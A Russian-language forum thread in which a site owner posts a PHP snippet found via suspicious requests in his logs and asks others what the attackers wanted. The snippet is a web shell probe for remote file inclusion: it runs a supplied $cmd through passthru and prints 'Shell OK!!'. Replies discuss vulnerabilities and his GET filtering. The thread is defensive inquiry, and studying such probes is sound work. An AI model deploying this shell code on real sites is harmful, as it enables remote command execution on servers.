Здравствуйте! Вот просматривал логи своего сайта и обнаружил забавные запросы: Если перейти вот по этому куску: То вот чего можно увидеть: PHP: Se voce esta vendo este codigo quer dizer que a shell nao eh vulneravel.... :( #============================================================================= if (isset($chdir)) @chdir($chdir); ob_start(); passthru("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp"); $output1 = "Shell OK!!\n"; $output = ob_get_contents(); ob_end_clean(); echo $output1; if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output)); #============================================================================== #============================================================================== ?> Вообще такие варианты обращений к сайту у меня предусмотрены, но я могу тоже чего-то не знать. Господа, вопрос такой. Может сталкивался кто с этой ерундой? Или поскажите, чего они хотели? У меня весь GET проверяется, но может я чего недопонимаю? :?: :?: :?:
Sergey M. шел хотели видимо используемый тобой скрипт когда-то имел уязвимость а может и теперь имеет
Да это я понял. Скрипт самописный не бесплатный. Обработаны все запросы. Базу не использует. Ошибки запросов не обрабатываются через сервак, т.е. все отдается в браузер типа "нет такой страницы", а не "error on line". Мне смысл не понятен. Или это случайный запрос от нечего делать, или они в директории пробиться хотели. Последнее время ко многим сайтам цепляют троянов. Причем не только к сложным, но и к простейшим хомякам на switch case построеным, но без фильтрации GET-а. Вот я и думаю. может знает кто как это делается, а соответственно и метод защиты понятен будет. А через галерею - это дохлый номер.
Что должно хранится в $_GET['sam'] и как оно используеца? Можно пример кода (пару строчек, не больше).
Все в принцыпе не сложно: $_GET['sam']; - линкует весь сайт в зависимости от принимаемого значения. Работает через switch/case на последнем этапе обработки после приема значений обрезается до двух символов. $_GET['modul']; - линкует директории не входящие в основную систему. значение для него работает через if обрезан до восьми символов. Остальные пары являются внутренними для галереи и ВСЕ не зависимо надо не надо проходят htmlspecialchars(); Я параноик